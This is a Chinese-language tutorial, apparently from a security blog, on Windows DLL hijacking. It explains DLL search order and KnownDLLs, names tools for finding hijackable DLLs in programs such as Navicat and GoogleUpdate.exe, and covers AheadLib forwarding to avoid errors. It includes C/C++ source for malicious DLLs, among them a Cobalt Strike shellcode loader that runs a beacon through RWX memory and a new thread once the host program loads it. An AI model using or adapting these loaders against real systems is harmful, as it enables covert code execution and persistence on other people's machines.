DLL 劫持

DLL 簡(jiǎn)介

在 Windows 中，許多應(yīng)用程序并不是一個(gè)完整的可執(zhí)行文件，它們被分割成一些相對(duì)獨(dú)立的動(dòng)態(tài)鏈接庫(kù)，即 DLL 文件，放置于系統(tǒng)中。當(dāng)我們執(zhí)行某一個(gè)程序時(shí)，相應(yīng)的 DLL 文件就會(huì)被調(diào)用。一個(gè)應(yīng)用程序可使用多個(gè) DLL 文件，一個(gè) DLL 文件也可能被不同的應(yīng)用程序使用，這樣的 DLL 文件被稱為共享 DLL 文件。

DLL 加載順序

如果程序需要加載一個(gè)相對(duì)路徑的 dll 文件，它將從當(dāng)前目錄下嘗試查找，如果找不到，則按照如下順序?qū)ふ遥?/p>

windows xp sp2 之前

Windows 查找 DLL 的目錄以及對(duì)應(yīng)的順序：

進(jìn)程對(duì)應(yīng)的應(yīng)用程序所在目錄；

當(dāng)前目錄（Current Directory）；

系統(tǒng)目錄（通過(guò) GetSystemDirectory 獲取）；

16 位系統(tǒng)目錄；

Windows 目錄（通過(guò) GetWindowsDirectory 獲取）；

PATH 環(huán)境變量中的各個(gè)目錄；

windows xp sp2 之后

Windows 查找 DLL 的目錄以及對(duì)應(yīng)的順序（SafeDllSearchMode 默認(rèn)會(huì)被開(kāi)啟）：

默認(rèn)注冊(cè)表為：HKEY_LOCAL_MACHINESystemCurrentControlSetControlSession ManagerSafeDllSearchMode，其鍵值為 1

進(jìn)程對(duì)應(yīng)的應(yīng)用程序所在目錄（可理解為程序安裝目錄比如 C:ProgramFilesuTorrent）

系統(tǒng)目錄（即 % windir% system32）；

16 位系統(tǒng)目錄（即 % windir% system）；

Windows 目錄（即 % windir%）；

當(dāng)前目錄（運(yùn)行的某個(gè)文件所在目錄，比如 C:Documents and SettingsAdministratorDesktop est）；

PATH 環(huán)境變量中的各個(gè)目錄；

windows 7 以上版本

從 Windows7 之后，微軟為了更進(jìn)一步的防御系統(tǒng)的 DLL 被劫持，將一些容易被劫持的系統(tǒng) DLL 寫(xiě)進(jìn)了一個(gè)注冊(cè)表項(xiàng)中，該項(xiàng)下的 DLL 文件就會(huì)被禁止從 EXE 自身所在的目錄下調(diào)用，而只能從系統(tǒng)目錄 SYSTEM32 目錄下調(diào)用，其注冊(cè)表位置：

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerKnownDLLs

自動(dòng)化挖掘

批量尋找劫持

https://github.com/wietze/windows-dll-hijacking

PLAINTEXT

1

python generate_pmc_files.py

單個(gè)查找劫持

https://github.com/knight0x07/ImpulsiveDLLHijack

編譯完成后，把 Prerequisites 文件夾里的內(nèi)容拷貝至 ImpulsiveDLLHijack 項(xiàng)目里

PLAINTEXT

1

ImpulsiveDLLHijack.exe -path xxx.exe

這里使用navicat進(jìn)行測(cè)試，可見(jiàn)運(yùn)行的時(shí)候會(huì)加載C:UsersdyyAppDataLocalProgramsPythonPython38Scriptsoci.dll

使用 cs 生成惡意 dll，重命名為oci.dll后放置到該目錄下

手動(dòng)挖掘

Process Monitor 查找可用 dll，設(shè)置如下圖所示

配置完可以保存導(dǎo)出配置，下次直接導(dǎo)入使用

使用GoogleUpdate.exe進(jìn)行測(cè)試，運(yùn)行程序 filter 加載所使用的 dll 文件

這里可以看出來(lái)，當(dāng)GoogleUpdate.exe程序運(yùn)行的時(shí)候，會(huì)調(diào)用當(dāng)前目錄下的goopdate.dll文件

編寫(xiě)一個(gè)基礎(chǔ)的彈窗 dll

JAVA

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

#include 
#pragma comment (lib, "user32.lib")

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH://DLL首次被加載到內(nèi)存時(shí)運(yùn)行
    case DLL_PROCESS_DETACH://DLL銷毀時(shí)運(yùn)行
    case DLL_THREAD_ATTACH://DLL線程加載時(shí)運(yùn)行
    case DLL_THREAD_DETACH://DLL線程銷毀時(shí)運(yùn)行
        break;
    }
    return TRUE;
}


extern "C" __declspec(dllexport) int DllEntry(DWORD ArgList, int a2) {
    MessageBox(NULL, "I am DLL !", "DLL", MB_OK);
    return 0;
}

彈計(jì)算器

JAVA

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

// dllmain.cpp : 定義 DLL 應(yīng)用程序的入口點(diǎn)。
#include "pch.h"
#include

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        system("calc");
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

CS 上線

cs 生成 c 的 payload

生成的payload填入到下面相應(yīng)的位置上

CPP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

// 頭文件
#include "pch.h"
#include 
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

HANDLE hThread = NULL;
typedef void(__stdcall* JMP_SHELLCODE)();
unsigned char shellcode[] = "xfcx48x83xe4xf0xe8xc8";


DWORD WINAPI jmp_shellcode(LPVOID pPara)
{
    LPVOID lpBase = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(lpBase, shellcode, sizeof(shellcode));
    JMP_SHELLCODE jmp_shellcode = (JMP_SHELLCODE)lpBase;
    jmp_shellcode();
    return 0;
}

////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 入口函數(shù)
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        DisableThreadLibraryCalls(hModule);
        hThread = CreateThread(NULL, 0, jmp_shellcode, 0, 0, 0);

    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
    }

    return TRUE;
}

運(yùn)行navicat程序就會(huì)上線

DLL 轉(zhuǎn)發(fā)劫持

有時(shí)候當(dāng)我們替換 dll 后，雖然可以執(zhí)行命令，但是會(huì)產(chǎn)生報(bào)錯(cuò)

這時(shí)候我們可以使用AheadLib工具，使惡意的 DLL 將原有的函數(shù)轉(zhuǎn)發(fā)到原 DLL 中并且釋放惡意代碼

打開(kāi)工具導(dǎo)入 dll 文件，會(huì)生成相應(yīng)的 cpp 文件

直接轉(zhuǎn)發(fā)函數(shù)，我們只能控制 DllMain 即調(diào)用原 DLL 時(shí)觸發(fā)的行為可控
即時(shí)調(diào)用函數(shù)，可以在處理加載 DLL 時(shí)，調(diào)用具體函數(shù)的時(shí)候行為可控，高度自定義觸發(fā)點(diǎn)，也稱用來(lái) hook 某些函數(shù)，獲取到參數(shù)值